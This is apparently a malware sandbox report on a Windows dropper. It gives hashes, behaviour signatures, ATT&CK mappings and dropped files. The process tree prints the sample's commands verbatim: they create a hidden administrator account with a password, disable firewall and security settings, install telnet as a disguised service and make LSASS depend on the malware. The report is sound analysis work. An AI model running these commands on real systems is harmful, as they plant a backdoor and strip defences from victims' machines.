Overview

overview

10

Static

static

5

b4eab841d5...18.exe

windows7-x64

10

b4eab841d5...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-11-2024 05:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe

  • Size

    1.5MB

  • MD5

    b4eab841d58d4dcd43923fc74e3613bb

  • SHA1

    7245a6bc53f54fc0b42d62dbe0b9d0d64e0c5e83

  • SHA256

    90791494c097ef09615aadcb8d6dde088e400f2d9b38bb6aef6a2c3d040b6ae2

  • SHA512

    9d1042ebb4c2243babe658bdbcba7037a83a2da35ace6126924693b9b83b52dd9a1aaffa4b5804a4b111e1225a0dbf88d5ee81ad0e74e9a30a197333b71c4a16

  • SSDEEP

    24576:fuNsvr8JXe4Di92MwUg38+8jX3V5qXYRmGnBia9fTi0gK8u5aPbOrddnNvfe:k7LMbR+8r3oYRfflRaP6dRRfe

Score
10/10
defense_evasiondiscoveryevasionupx

Malware Config

Signatures

  • Modifies firewall policy service 3 TTPs 8 IoCs
    evasion
  • Modifies security service 2 TTPs 2 IoCs
    evasion
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 64 IoCs
  • Enumerates connected drives 3 TTPs 21 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

    discovery
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
    defense_evasion
  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 47 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Time Discovery 1 TTPs 2 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

    discovery
  • Runs .reg file with regedit 10 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2092
    • C:\Windows\Java\classes\Run.exe
      "C:\Windows\Java\classes\Run.exe" -h javavm.bat
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2776
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c javavm.bat
        3⤵
        • Loads dropped DLL
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2604
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s javavm.reg
          4⤵
          • System Location Discovery: System Language Discovery
          • Runs .reg file with regedit
          PID:2068
        • C:\Windows\Java\classes\javavm.exe
          C:\Windows\Java\classes\javavm.exe -i
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2352
        • C:\Windows\SysWOW64\net.exe
          net user Support f*ck!n_h3ll /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES
          4⤵
          • System Location Discovery: System Language Discovery
          • System Time Discovery
          • Suspicious use of WriteProcessMemory
          PID:1660
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user Support f*ck!n_h3ll /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES
            5⤵
            • System Location Discovery: System Language Discovery
            • System Time Discovery
            PID:1400
        • C:\Windows\SysWOW64\net.exe
          net localgroup administrators Support /add
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2692
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup administrators Support /add
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2848
        • C:\Windows\SysWOW64\net.exe
          net localgroup administrators Support /add
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2136
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup administrators Support /add
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1636
        • C:\Windows\SysWOW64\net.exe
          net localgroup Administratoren Support /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1668
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup Administratoren Support /add
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1416
        • C:\Windows\SysWOW64\net.exe
          net localgroup administrat÷rer Support /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1652
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup administrat÷rer Support /add
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2504
        • C:\Windows\SysWOW64\net.exe
          net localgroup administradores Support /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:572
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup administradores Support /add
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1056
        • C:\Windows\SysWOW64\net.exe
          net user Support /comment:"Built-in account for administering the computer/domain"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2664
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user Support /comment:"Built-in account for administering the computer/domain"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2824
        • C:\Windows\SysWOW64\net.exe
          net accounts /maxpwage:unlimited
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1516
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 accounts /maxpwage:unlimited
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1980
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h C:\docume~1\Support
          4⤵
          • Sets file to hidden
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:2944
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s hide.reg
          4⤵
          • Hide Artifacts: Hidden Users
          • System Location Discovery: System Language Discovery
          • Runs .reg file with regedit
          PID:2128
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s fw1.reg
          4⤵
          • Modifies firewall policy service
          • System Location Discovery: System Language Discovery
          • Runs .reg file with regedit
          PID:1236
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s fw2.reg
          4⤵
          • Modifies firewall policy service
          • System Location Discovery: System Language Discovery
          • Runs .reg file with regedit
          PID:1828
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s telnet.reg
          4⤵
          • System Location Discovery: System Language Discovery
          • Runs .reg file with regedit
          PID:1016
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s kill.reg
          4⤵
          • Modifies security service
          • System Location Discovery: System Language Discovery
          • Runs .reg file with regedit
          PID:1036
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s tray.reg
          4⤵
          • System Location Discovery: System Language Discovery
          • Runs .reg file with regedit
          PID:3052
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s TS.reg
          4⤵
          • System Location Discovery: System Language Discovery
          • Runs .reg file with regedit
          PID:3044
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s ts1.reg
          4⤵
          • System Location Discovery: System Language Discovery
          • Runs .reg file with regedit
          PID:2172
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s ts.reg
          4⤵
          • System Location Discovery: System Language Discovery
          • Runs .reg file with regedit
          PID:2952
        • C:\Windows\Java\classes\sc.exe
          sc config javavm error= ignore
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:2052
        • C:\Windows\Java\classes\sc.exe
          sc failure javavm actions= restart/500 reset= 10
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:1772
        • C:\Windows\Java\classes\sc.exe
          sc config lanmanserver depend= javavm
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:2164
        • C:\Windows\Java\classes\sc.exe
          sc config lanmanworkstation depend= javavm
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:3060
        • C:\Windows\Java\classes\sc.exe
          sc config LSASS depend= javavm
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:1572
        • C:\Windows\Java\classes\rgv.exe
          rgv -set REG_DWORD \HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters\AutoShareWks=0x00000000
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:844
        • C:\Windows\Java\classes\rgv.exe
          rgv -set REG_DWORD \HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters\AutoShareServer=0x00000000
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2784
        • C:\Windows\Java\classes\rgv.exe
          rgv -set REG_DWORD \HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\DisableWebDAV=0x00000001
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:696
        • C:\Windows\Java\classes\rgv.exe
          rgv -set REG_DWORD \HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous=0x00000001
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:956
        • C:\Windows\Java\classes\rgv.exe
          rgv -set REG_SZ \HKLM\SOFTWARE\Microsoft\Ole\EnableDCOM=N
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2564
        • C:\Windows\Java\classes\xnet.exe
          xnet stop msjava
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2216
        • C:\Windows\Java\classes\xnet.exe
          xnet start javavm
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1568
        • C:\Windows\Java\classes\xnet.exe
          xnet install Ntf /b:C:\Windows\system32\tlntsvr.exe /n:"Network Interface" /i:no /s:auto
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1668
        • C:\Windows\Java\classes\xnet.exe
          xnet start Ntf
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1652
        • C:\Windows\Java\classes\kill.exe
          kill.exe javakitbbs.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2396
  • C:\Windows\Java\classes\javavm.exe
    C:\Windows\Java\classes\javavm.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:1140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

1
T1098

Create or Modify System Process

2
T1543

Windows Service

2
T1543.003

Privilege Escalation

Account Manipulation

1
T1098

Create or Modify System Process

2
T1543

Windows Service

2
T1543.003

Defense Evasion

Hide Artifacts

3
T1564

Hidden Files and Directories

2
T1564.001

Hidden Users

1
T1564.002

Impair Defenses

1
T1562

Disable or Modify System Firewall

1
T1562.004

Modify Registry

2
T1112

Credential Access

Discovery

Password Policy Discovery

1
T1201

Peripheral Device Discovery

1
T1120

Permission Groups Discovery

1
T1069

Local Groups

1
T1069.001

Query Registry

1
T1012

System Information Discovery

2
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

System Time Discovery

1
T1124

Lateral Movement

Remote Services

1
T1021

Remote Desktop Protocol

1
T1021.001

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\Java\classes\NPJava11.dll
    Filesize

    64KB

    MD5

    2be0b20f4893bf3830391342b1668d0a

    SHA1

    186482291249474fc358adb8fdcd0a216d32eae0

    SHA256

    20555e97e625f49ac44c84c36c3fc21bb5d20c0c35b4ff60174870606ca767b4

    SHA512

    976caa55bcb085a25471d97dccd8fc583737e1c6ea4027d59d53ef4bd633b59dfdea97ff15bd830b36f5bcf5eb45702ea6242e01451006f4076afd5d9cb1f0b4

    Download Submit

  • C:\Windows\Java\classes\NPJava12.dll
    Filesize

    64KB

    MD5

    841c522dc7db4ae4961a31a491d661df

    SHA1

    fccb082cf288ffd1e947f3f783884cd0a39d9346

    SHA256

    63eaff9a275e67f956b05be0216fe9ccc652f3e2e6d7fda4de01f70e3c977829

    SHA512

    232593c0a3900f6669fe954e418c9e52f340b0b601b6b9023dfae4db965278feaf324e262d19994b5f249666d993aac5496969c9fc5f40386cc4bdbe9936010d

    Download Submit

  • C:\Windows\Java\classes\TS.reg
    Filesize

    667B

    MD5

    d67c4330a68ea2e8a32e4ff5e84a19b3

    SHA1

    22e2aff209240edb456267c1b2592a7c45a5da91

    SHA256

    48151fe2050d0142e8f28ec55d73edbdc0a9a6502a1204181328761772137252

    SHA512

    e41188c478e38d20238acc5727bae1fe38df854ce6c6826e7003b73e87844229dcdd2d9fd7bc28661be8bac227d25c7da37f680eafd80ffda7def774aa59a17a

    Download Submit

  • C:\Windows\Java\classes\bin\JavaVM.dll
    Filesize

    100KB

    MD5

    e44b153a7bb508f116040a4011f8b0a4

    SHA1

    d8a467139a5e7238775ff880c60b82ec052d789e

    SHA256

    57ccb57244b89d2e187253aec1d2266581dfe3dfc467c8e051bcb4ba8734dbbc

    SHA512

    dddb2c4f2bb8615b23df2516a9121dac7cb48f430cb3c30cfbba4f22f8429b3ccee845abe2399aa6156fef22f9d919bb8bdfd1c1bb5ce0bc25868288885c735a

    Download Submit

  • C:\Windows\Java\classes\fw1.reg
    Filesize

    477B

    MD5

    5ced491cbd02bc282ead65b0f5d3a5af

    SHA1

    1f2ca3b52399ab77156c1b15274b139e165daf63

    SHA256

    df1489e010c31f51acd429bd24148da8b68126c233af94391feef67b52c151f4

    SHA512

    34f750f1eb12af6690f99d3623f5c00f19608650a225ecb6c2523b349e7fe04cfd1741c0472cb828aa2a7b19c4966d73859f038c0d52803e0eb1cb44ca577cd7

    Download Submit

  • C:\Windows\Java\classes\fw2.reg
    Filesize

    464B

    MD5

    6444969edcdc16b62ad569e8bc1aceaa

    SHA1

    93878224cdfae462eff38cd5fa3e4b913e22e67a

    SHA256

    da9a601e50414fa3f9ed0b74dfbc797fe9e9cac40bbfb85ef2e79af739370d45

    SHA512

    a67876ebccfb46b3be71dbf4718750996d481ec1dc4625954f032d089b874a06f4b0998667ee57792845b4602076894b85bafafc772fd362c4d82f90de573960

    Download Submit

  • C:\Windows\Java\classes\hide.reg
    Filesize

    168B

    MD5

    25cf6449a1104d5b821f3fda946f9d79

    SHA1

    a8185e07962b668e246e9402c5da4338a282c1e2

    SHA256

    29a30a2d24c76430673f7c0d094780c9915ba4bbe275e13f970f5e0c41b8772f

    SHA512

    ee1f0f98ae658d21095ac3a604516d716b0d1fc5f2c387902a43a2526c3a763ef29ccd330ffca28a3ecbba7666e54a57333b490bd9ced15da9ca2192efe9644b

    Download Submit

  • C:\Windows\Java\classes\hpi.dll
    Filesize

    28KB

    MD5

    f2efc1ae19644c27a8cc187b7f19a074

    SHA1

    03a7ddc2823036f9d3806f740377ca7f75eb0a72

    SHA256

    8020454b8f4be95abf8c339a06d3c26032f982ac521389764b46dc73785f0cb1

    SHA512

    c82e56f5eda1d02b04f5b2ed3f23b031782ba231b87d4f5f7bea30cdd28da9cd2b663d8a6193e5a33bfbeab7785646ad34d114afec223ed2ac1ccb5a8f60bce9

    Download Submit

  • C:\Windows\Java\classes\java.dll
    Filesize

    101KB

    MD5

    186e958a270a2754dfb8d61810ea651a

    SHA1

    55181d2855a32cd83f8a74264d12b920e1f005c8

    SHA256

    4383a5b3e30fa96a458daeb14be8c2b6c66014530f05906c1559e3f496b0597d

    SHA512

    9ef3084a0de208464cfdc95d299108bb4ae8bb58ebc278d470b958165702a53d5d6be3c72515532b29921b67c14527a9206750fa283d13f046445ab107b63369

    Download Submit

  • C:\Windows\Java\classes\java.exe
    Filesize

    24KB

    MD5

    9e0c87fc9797536eaff23ebfe05763cc

    SHA1

    c1121bd40e51b9668c0fa6f12d1001d4a398636a

    SHA256

    3732ad44e26f547fc7edd120c34a3af1aeace7aaa838221defeef2dc7af16839

    SHA512

    1a098edaf6aa19ab80ead01cf6969265794dcaef9826415578514f5b394128ad9790e2194083009a7eaeade6b235d526b2dcb63dc3218f260f3e6be1bee3877a

    Download Submit

  • C:\Windows\Java\classes\java.ocx
    Filesize

    74KB

    MD5

    e256b0370b252f2a261c749ad9069ab9

    SHA1

    07a96f9de7fdb0ee9dea0d34f2e8ff878bb78e05

    SHA256

    65e9a7b4decc8b61c530e022e1f1a93f2ed121ccbf3973178329a8a8aab8afd1

    SHA512

    f3ddea15d09f92f310883132b00eb1abf1e62cf421c5791d13c82bd5ca21ee5dcd45dc3a620252e9ba5bf276ee2e27535386122d96e16270348fd56198acc51c

    Download Submit

  • C:\Windows\Java\classes\javavm.bat
    Filesize

    5KB

    MD5

    9f76b920bf5c9e52f04e400d85b20458

    SHA1

    d978b365d399914abe7693001af7bf14835d203e

    SHA256

    352bfea11674413e2a9817c94f90ad8ed77791d372623fef64606576e557e69c

    SHA512

    6e02080b21881f4e6f325ffc6f3b781dce2fa58f27668113d391e02579e6f223c4a1e5af3a6e17067f5314722b5bbb9c4330340624b55d4bc6a814e8e6a87834

    Download Submit

  • C:\Windows\Java\classes\javavm.exe
    Filesize

    633KB

    MD5

    543062f19c468e7bf5769f2156907b32

    SHA1

    8665cbc73c1d19138b8dc33891995dd0bb8da87d

    SHA256

    5cfe7a71af5c2767c081af23d149ce26699f391874e9a0219295200e6ada470d

    SHA512

    1742d735a83bed3a9bd1d391ed7265df80f75cc0cecfea2c68d42e6323164b14ee384ea5f9a4a54b29c60ed053ca0350b90a3f7c9537b696dc4b08d9bdba4d9e

    Download Submit

  • C:\Windows\Java\classes\javavm.reg
    Filesize

    4KB

    MD5

    be2681679407d7f67372b54c126b5c98

    SHA1

    e6bae2a5a13d9b072cb335c616943b5e4ba0298e

    SHA256

    40c7284659a2574dca7fa2bdaee8254e7891470c85f1f7199ab496fa4b914a01

    SHA512

    a3b10982a42da21aaf30760262f1ca0594fe2b6c1a1f69ea1649efaf4bf57e6ca5cfbde578b495ab4ca64364b6a0b771f348ab363b802dd621ceb73dc1c7ed9c

    Download Submit

  • C:\Windows\Java\classes\javaw.exe
    Filesize

    28KB

    MD5

    90c18175befaa9b9960697dce479d927

    SHA1

    c8c88a0778c3e8df77bfda857cc54a535ad198e0

    SHA256

    1327dd2ab90c42f0288d7b534a6664f25f258695549cc654eb99f88379d3e116

    SHA512

    cce9a252837b70c56af17cab0358e1efceb628a5752edad7aabcd07011f4960adcf53a014f4b84cf99901df4f4b77fd280272fb5455e61681023aee9e8bfb2a2

    Download Submit

  • C:\Windows\Java\classes\jawt.dll
    Filesize

    20KB

    MD5

    a376812a016f72b676c5f571962c3a93

    SHA1

    f372003f2b85d33ffe33e5f3924c003a99a154df

    SHA256

    de79e5c557429b09b54512421995e722bce8b677e95b4db62c7705cb16764ada

    SHA512

    f77f2936a4a786479aa62f20c33d312e294c143d5afd0702255880ef953938b67937fc74d67cbc7a7d2b7975cda0758efb17b0de3ad02a972af5f3dfe3d577db

    Download Submit

  • C:\Windows\Java\classes\jpicpl32.cpl
    Filesize

    997B

    MD5

    75bdc7bd2ef5cfd8882e2c720d83cf9b

    SHA1

    bdcc2c80f064f3547a17d4bd3aeaa738d1cd9d83

    SHA256

    1f50a401f11ee498beb2980b802039f4ace9e9e9c3c93cf3341574ab0dea6374

    SHA512

    2f94d834902a206041afbe325cba240509924ae1f39d98cc46de5d42e1f885e14c2aaef0b8d3a7a14600a4eb9b2f6facbe841870f07dd53529c570812725e534

    Download Submit

  • C:\Windows\Java\classes\jpicpl32.dll
    Filesize

    951B

    MD5

    fa73667b5c06d524547dc4a421fda7d0

    SHA1

    baaa2eac623a4062ad62aaadaede11b20898c009

    SHA256

    05e56605cb17622f7eae4c6d53001ecdff8eb610e39f4057141f8c0b61e0ad10

    SHA512

    4297dfc3ef504f708bfcb37a51c5e24ecf41e21e0eb56b73a66d9e9b1747f6427b88740c678b247863312f1a61d5752f8517857352fa5aaf54be541372b96d07

    Download Submit

  • C:\Windows\Java\classes\jpicpl32.exe
    Filesize

    16KB

    MD5

    61120a568434fc9c9a4899ca91fa2a61

    SHA1

    b0fe6a5cd47d2a36a1f13d3f6f53948f0dccfe5f

    SHA256

    b99a9ea08331d837dbb5ec21850cd8f485ecdf916aaafe01945d99f55a9df6d1

    SHA512

    97beae4ddada51829055a0d5ff20f79af0ac48a480ee78fda6dc4676eafdbdad72b6e642bff3ddf3f728948f01f2dc79b0e6c1b49195ae6e522eed3fb9fa36bb

    Download Submit

  • C:\Windows\Java\classes\jucheck.exe
    Filesize

    236KB

    MD5

    4890caaa9ab8d4b2f12e7beee986ed5a

    SHA1

    56e1631d3840e1effad42b2c2b1927fe9bc7e02c

    SHA256

    3ae1ee77b6564cea40164f3ef82724356cb2d1097e4b83f76e6229e21ae290d4

    SHA512

    8c551538449680fdce035f912f16f75ef776fd410fc6038e19da5aea63c9c693613346a38e33b98efabb9a49ea36bc8b68c3d9b767ffed57c7d86edabd13f181

    Download Submit

  • C:\Windows\Java\classes\kill.reg
    Filesize

    283B

    MD5

    420ce0bdb9a6c3dae71f2378e3d8efa5

    SHA1

    50864ac527c101bf1bf8c7ee7d45b9e9fe0ccbd6

    SHA256

    cfe5f0114add09bccdda67d4509516f3baceef88d3153188eb56cbb51216fb21

    SHA512

    ed08867c2a78e26be3d3bda99155851095621d277f3dbd69757704c33fafaf3cf791783280ea57c50760ced37c040c3690f84b042b22c5032bc82c0696bae237

    Download Submit

  • C:\Windows\Java\classes\nio.dll
    Filesize

    32KB

    MD5

    601e236656e22a4290855ac6a73b3060

    SHA1

    68ea8712ce455d491a4e2b693e98fad215643023

    SHA256

    b767b0e54fbdf9f8ac5f01863d2a0a6cde75c235a97d57dddb49de35018d41f5

    SHA512

    8eb08b87a6183b9b64da7ee3eda585d4cd5b36298f28d94694f6ce3c195d4cef8b3126e9ba7c0fa78798cc218fd586637297f9375588dd2f2217d94b5d9d4356

    Download Submit

  • C:\Windows\Java\classes\rmi.dll
    Filesize

    20KB

    MD5

    006900af4ccb2301af9f1e129d7d17f4

    SHA1

    2f16dcbb6c77a8b68a84d35a98d7385092e23077

    SHA256

    3937287496e3eba97452178fe56a81113cc35a59e20cb6f1843b7d49f55bc655

    SHA512

    a0ca8dc7f51dbcd57820d0b2128af5f8434263253108ca6153da6ec875d4d1d944964962115bcb52a5d0b5fde5294b6f315c78af620cb61a810cf0acd26e9e18

    Download Submit

  • C:\Windows\Java\classes\telnet.reg
    Filesize

    126B

    MD5

    a043607e5a8945539fc126c4212b810d

    SHA1

    271cf9d7ea60e5499aef367f21ca8ad0fd48a247

    SHA256

    deffcdd043b5be8640834fb253cba41264572363902f2ccba1d4c1ba5c47412f

    SHA512

    da2cca2095d8d3f6fc865247a6ad98285b8fea0c21bf5411c2a1e7b3e56a0b5a412145819f41b5aeb7af7551101c0ffa216f026764db4b0259f48ec7361806c3

    Download Submit

  • C:\Windows\Java\classes\tray.reg
    Filesize

    149B

    MD5

    18c7105888def33184d87a0ac25fa9ac

    SHA1

    5fe63850a27b1913ef46371fb4b22f95884dd7a5

    SHA256

    6e3a811874bc8f147a146e3bcfea1ff9aa0decef29b6e6ce844095ccd597827e

    SHA512

    0e1794a67da2e3b842bf32d656cc7abdd8e1d15e534c4008a142a1530c8d0d50c78b1d31e084b4408753b44a7d764d8f24247752b1fac9e0901f1c1d9af56698

    Download Submit

  • C:\Windows\Java\classes\ts1.reg
    Filesize

    136B

    MD5

    5ab3fd11acf94c521713be16edec38e4

    SHA1

    d6647025385b5dc9018bd9db7d6257905ff2efe0

    SHA256

    d34a15bf6baf122d5f8796042029434bc8f3d78b8025e2e126229af08474abef

    SHA512

    47f360271f18c8c5ee9a5435f11169d862231d5960775fc0ef930722ff63a9f7071b93cd560f4e8e6ef8b639140c2365ec6ba521735ccc040587cda49fb63d31

    Download Submit

  • C:\Windows\Java\classes\~DF1BDFB9CF.tmp
    Filesize

    1KB

    MD5

    e6b158212d01ab5f0a20131b99d11c1f

    SHA1

    e42abeada213e502054fe4d1a8768099df5bc67c

    SHA256

    2a48c111a90b303c23cf948ea1d7dadeec2e66ab19d0a96f4eeb47b52e6f88aa

    SHA512

    e0ff79f4b43ddad0300cfd8a52a452df74d25ba6b01bb168c70d6d61093b81236d6283259a89f736293b589e5e9a69a8634d1cfbc6c03b7cd78235913e73b8e8

    Download Submit

  • C:\Windows\Java\classes\~DF2BDFB9CE.tmp
    Filesize

    763B

    MD5

    2642bbc169d323ca3be07f0e9bec2619

    SHA1

    ebb7cda7c7ce73f909dd2f8d33a19a70c4ffb4f3

    SHA256

    1e6d150764139cb5ae8de027740878bfb7a4657936110ce08a7725edd1e67dbf

    SHA512

    f334b354acc0ded25f8de699241f38a5e6773cfccd34498562e5b97ea22614cf9e53feabac69918e4acfc32f8f26c6df8ef72652d906df0f6924b6d0c1c9b9cc

    Download Submit

  • \Windows\Java\classes\Run.exe
    Filesize

    88KB

    MD5

    2d0c1b9de2fd4884ef19198159d01e1a

    SHA1

    d6c93bef0d604dc4e0c8b8187c75498cc9b585a0

    SHA256

    1fd0ba721c8493f4560c5d4a7e811f7d94cb6bd40e916843fa0b309bac047e41

    SHA512

    9abc89fec58cb02ab6d815ee8bc7381a137e978d651ac7c1f40519de0605e326f7c22af78e156adfab95525f01ebcc51334d5ae4e3e9bcb4c6f773fdc634a0f7

    Download Submit

  • \Windows\Java\classes\sc.exe
    Filesize

    34KB

    MD5

    7a2cbc362a7b514b807459d470aefb13

    SHA1

    744ef594a67ffa74378391fc3f063507ced8da3e

    SHA256

    da2cac5c1677ae4417664b6e5030ed9b8bc168895bfe6d2ba0c502b17315755f

    SHA512

    b4652bc2895dafbad38092c93dd584ab9104a09b2de91149ae348715a33c6324977679c4fc4c84361e179a7365b6e1b66e05fda52fd3245bae531f28a44476d5

    Download Submit

  • memory/696-153-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

    Download

  • memory/844-148-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

    Download

  • memory/844-147-0x00000000001C0000-0x00000000001D9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/844-146-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

    Download

  • memory/956-156-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

    Download

  • memory/1140-209-0x0000000002240000-0x0000000002312000-memory.dmp

    Filesize

    840KB

    Download

  • memory/1140-210-0x00000000003D0000-0x00000000003F7000-memory.dmp

    Filesize

    156KB

    Download

  • memory/1568-166-0x0000000000230000-0x000000000024B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/1568-213-0x0000000000400000-0x000000000041B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/1572-144-0x0000000001000000-0x000000000100C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1652-219-0x0000000000400000-0x000000000041B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/1652-221-0x0000000000230000-0x000000000024B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/1652-222-0x0000000000400000-0x000000000041B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/1652-220-0x0000000000230000-0x000000000024B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/1668-217-0x0000000000400000-0x000000000041B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/1668-215-0x0000000000230000-0x000000000024B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/1668-216-0x0000000000230000-0x000000000024B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/1772-139-0x0000000000030000-0x000000000003C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2052-132-0x0000000001000000-0x000000000100C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2092-0-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/2092-1-0x0000000000820000-0x0000000000844000-memory.dmp

